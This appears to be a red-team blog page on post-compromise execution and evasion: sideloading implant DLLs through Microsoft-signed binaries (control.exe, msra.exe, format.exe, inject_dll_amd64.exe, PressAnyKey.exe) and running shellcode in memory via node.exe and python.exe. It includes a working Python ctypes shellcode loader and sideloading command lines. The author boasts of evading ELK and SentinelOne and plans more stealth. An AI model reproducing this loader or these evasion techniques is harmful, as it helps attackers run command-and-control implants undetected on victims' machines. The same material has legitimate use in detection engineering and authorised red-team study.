C2 - Foster Parents

Abuse obscure Microsoft-signed binaries to sideload malicious DLLs via search-order hijacking, COM shims, or legacy tool dependencies.

Node.js In-Memory Shellcode

Following the widely publicized NPM blockchain compromise, increased attention was directed toward the behavior of node.exe. . This led to a focused assessment of how Node.js can be leveraged for stealthy post‑compromise activity. Because node.exe routinely generates legitimate HTTPS traffic, it provides a natural level of cover that can obscure command‑and‑control communication.

The project examined how Node.js can be used to execute malicious payloads directly in memory. In this approach, shellcode is loaded and run within the node.exe process without creating additional processes or writing files to disk. This behavior is made possible through Node.js’s capability to interact with native code and Windows APIs, enabling in‑memory execution that is difficult for traditional security controls to detect.

C2 implant running within node.exe process

My future plan is to upgrade this project to be more stealthy, as for now I've tested on ELK and SentinelOne and the results are as usual no detections.

Control.exe - Dll Sideloading

By invoking control.exe with the syntax control "C:\path\to\implant.dll" the Windows Control Panel loader (control.exe) loads the DLL under the context of rundll32.exe as the parent process (due to COM activation). This technique leverages the Control Panel Item (.cpl) execution mechanism, where CPlApplet is the designated entry point. When the DLL is loaded, rundll32.exe spawns as a child of explorer.exe (if executed via GUI) or the calling process (if run from CLI), while the actual payload executes within control.exe’s memory space.

Detection evasion is achieved by process ancestry spoofing, as monitoring tools often focus on child-parent relationships (e.g., rundll32 spawning from cmd.exe is suspicious, but control.exe invoking rundll32 appears benign). The DLL must export CPlApplet to comply with the expected function prototype (int APIENTRY CPlApplet(HWND hwndCPL, UINT msg, LPARAM lParam1, LPARAM lParam2)).

Python.exe - Dll Sideloading

The ctypes module in Python allows direct interaction with the Windows API, enabling in-process DLL loading without spawning a child process. By calling ctypes.WinDLL() or ctypes.CDLL(), we can load a DLL into python.exe’s memory space, avoiding suspicious process creation (e.g., rundll32.exe). The payload executes within Python’s process context, blending in with legitimate scripting activity.

Python.exe - Load Shellcode

Same as mentioned before ctypes module in Python allows direct interaction with the Windows API. This allows to directly load shellcode into the process memory of python.exe by calling Windows APIs.

The below script loads shellcode in the simplest manner, it can easily be improved by adding stealth techniques like such as encrypting shellcode, env keyying, fileless shellcode and more.

import ctypes as kk
import sys

def O(shl_f):
    with open(shl_f, 'rb') as f:
        b_x = f.read()

    kk.windll.kernel32.VirtualAlloc.restype = kk.c_void_p
    kk.windll.kernel32.CreateThread.argtypes = (
        kk.c_int, kk.c_int, kk.c_void_p, kk.c_int, kk.c_int, kk.POINTER(kk.c_int)
    )

    spc = kk.windll.kernel32.VirtualAlloc(
        kk.c_int(0), kk.c_int(len(b_x)), kk.c_int(0x3000), kk.c_int(0x40)
    )
    bf = (kk.c_char * len(b_x)).from_buffer_copy(b_x)
    kk.windll.kernel32.RtlMoveMemory(kk.c_void_p(spc), bf, kk.c_int(len(b_x)))
    hndl = kk.windll.kernel32.CreateThread(
        kk.c_int(0), kk.c_int(0), kk.c_void_p(spc), kk.c_int(0), kk.c_int(0),
        kk.pointer(kk.c_int(0))
    )
    kk.windll.kernel32.WaitForSingleObject(hndl, kk.c_uint32(0xffffffff))
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python code-py.py shellcode file")
    else:
        shl_f = sys.argv[1]
        O(shl_f)

msra.exe - DLL Sideloading

By default, msra.exe (Microsoft Remote Assistance) attempts to load userenv.dll from its directory upon execution, calling the exported function GetProfileType during initialization. This behavior enables DLL hijacking when a implant DLL (renamed to userenv.dll) is placed alongside msra.exe, forcing the OS loader to prioritize the local directory over System32.

Microsoft.NodejsTools.PressAnyKey.exe

Microsoft.NodejsTools.PressAnyKey.exe is a utility bundled with Visual Studio’s Node.js development tools, designed to pause console applications (e.g., "Press any key to continue..."). It accepts command-line arguments to launch a process before waiting for user input.

This can abuse this to execute a binary files (DaBombC4.exe) as a child process while maintaining a benign parent process tree.

This binary can be found on the below location as Microsoft signed binary.

C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools

The Process Hacker shows the implant binary running under Microsoft.NodejsTools.PressAnyKey.exe

Format - DLL Sideloading

A lesser-known DLL sideloading technique abuses the Windows format.exe binary by supplying a fake filesystem type via the /fs parameter.

When executing format C: /fs:test, Windows attempts to load utest.dll from the current directory. I crafted utest.dll the DLL’s DllMain function is executed within the context of the format.exe process. In this demonstration, a utest.dll payload displays a message box when triggered. Process Hacker confirms the format.exe process in memory with the loaded malicious DLL.

The downside to this technique is that I found it challenging to load implant DLL

DllMain has strict limitations in regards to executing WinAPI calls, this interapts the implant execution routine.

Inject_dll_amd64.exe - DLL Sideloading

Microsoft signed binary allows for DLL sideload

inject_dll_amd64.exe 5188 DaBombC4.dll

Register-CimProvider.exe - Dll Sideloading

This a potenialy vulnerable Windows binary for DLL hijacking, it requires serveral specific export function from the imported implant dll file.

PreviousBypass O365 Email Security NextPhish like an APT

Last updated 8 days ago